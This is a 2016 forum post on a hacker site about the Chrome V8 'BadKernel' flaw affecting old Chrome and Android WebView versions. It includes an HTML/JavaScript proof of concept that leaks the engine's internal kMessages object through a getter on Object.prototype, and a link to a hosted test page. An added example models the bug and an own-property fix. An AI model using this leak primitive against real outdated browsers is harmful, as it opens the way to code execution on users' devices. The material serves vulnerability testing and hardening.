HackerTop
https://hackertop.org/

Google Chrome V8 BadKernel Vulnerability
https://hackertop.org/viewtopic.php?f=11&t=40

Author:  Lyon [ Tue Aug 23, 2016 11:14 am ]
Post subject:  Google Chrome V8 BadKernel Vulnerability

Google V8 is the open-source JavaScript engine developed for the Chrome browser.

The vulnerability is due to the exception type "observe_accept_invalid" in the source code being mistakenly written as "observe_invalid_accept".

An attacker can use the vulnerability to leak the kMessages key object and execute arbitrary code.

Mobile apps built on the system WebView control of Android 4.4.4 to 5.1 are likely to be affected by the vulnerability.


Google Chrome V8: versions 3.20 ~ 4.2

Android: versions 4.4.4 ~ 5.1

Code:
Proof of Concept
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>badkernel</title>
</head>
<body>
<script type="text/javascript">
    var kMessages;
    // Getter named after the message key that Object.observe looks up in the
    // engine's kMessages table when its third argument is invalid. The table
    // entry is mistyped, so the lookup misses and falls through to
    // Object.prototype, where this getter runs with `this` === kMessages.
    Object.prototype.__defineGetter__("observe_accept_invalid", function(){kMessages=this});
    try{
        // Third argument must be an array of strings; 1 triggers the error path.
        Object.observe({},function(){}, 1);
    } catch(e) {
    }
    delete Object.prototype["observe_accept_invalid"];
    // Vulnerable engine: the internal kMessages object; patched engine: undefined.
    alert(kMessages);
</script>
</body>
</html>


Or

http://poc.hackertop.org/Android/v8rce_poc.html



Open the page above in the browser and check whether it can obtain the kMessages object:

If the output is the object, the browser is vulnerable.

If the output is undefined, the browser is not vulnerable.


chrome://version


Refer:

http://www.cnnvd.org.cn/vulnerability/s ... 2016080414
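The mechanism behind the proof of concept, shown on a constructed stand-in rather than V8 itself (this example is added here and is not code from the original post): a message table is indexed with a key that was mistyped when the table was written, the plain `[]` lookup misses the own property and walks up to `Object.prototype`, and a getter installed there by page script runs with the internal table as `this`. The same code shows the hardening an engine or library author would apply: build the table without a prototype and check own properties only. `kMessagesVulnerable`, `kMessagesHardened`, `formatMessage*` and `attackerLeak` are names chosen for this example, and the message text is a constructed sample.

```javascript
// Added example, not from the original post or from V8: models the
// missing-key lookup that lets a getter on Object.prototype observe an
// internal object, and the own-property lookup that closes the hole.

// Vulnerable stand-in for an engine's message table. The key is mistyped
// ("observe_invalid_accept" instead of "observe_accept_invalid"), so a
// lookup for the key the error path actually uses finds no own property.
const kMessagesVulnerable = {
  observe_invalid_accept: ["Third argument to Object.observe must be an array of strings."],
};

// Hardened table: no prototype at all, so an unknown key yields undefined
// without ever consulting Object.prototype. (The typo is left in place so
// the lookup still misses; the point is that a miss is now harmless.)
const kMessagesHardened = Object.assign(Object.create(null), {
  observe_invalid_accept: ["Third argument to Object.observe must be an array of strings."],
});

// Vulnerable lookup: plain [] indexing walks the prototype chain, so for a
// missing key an attacker-controlled getter on Object.prototype runs with
// `this` bound to the internal table.
function formatMessageVulnerable(type) {
  const format = kMessagesVulnerable[type];
  if (!format) return "<unknown message " + type + ">";
  return format[0];
}

// Hardened lookup: only own properties of a prototype-less table are
// consulted, so page script cannot interpose a getter on the miss path.
function formatMessageHardened(type) {
  const format = Object.prototype.hasOwnProperty.call(kMessagesHardened, type)
    ? kMessagesHardened[type]
    : undefined;
  if (!format) return "<unknown message " + type + ">";
  return format[0];
}

// Attacker side, mirroring the proof of concept: install a getter under the
// key the error path looks up, trigger that path, and return whatever object
// the getter saw as `this`. The getter is removed again in `finally`.
function attackerLeak(formatMessage) {
  let leaked;
  Object.defineProperty(Object.prototype, "observe_accept_invalid", {
    get() { leaked = this; },
    configurable: true,
  });
  try {
    formatMessage("observe_accept_invalid");
  } finally {
    delete Object.prototype["observe_accept_invalid"];
  }
  return leaked;
}

// Stand-alone demonstration when run directly with node.
if (typeof require !== "undefined" && require.main === module) {
  console.log("vulnerable lookup leaks table:",
    attackerLeak(formatMessageVulnerable) === kMessagesVulnerable);
  console.log("hardened lookup leaks nothing:",
    attackerLeak(formatMessageHardened) === undefined);
}
```

The leak itself is only the first step: whatever `this` is on the miss path is the table object the engine keeps internally, and the getter could equally return a crafted array to control `format[0]`. Either way the fix is the same, keep internal tables off the ordinary prototype chain and look up own properties only.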
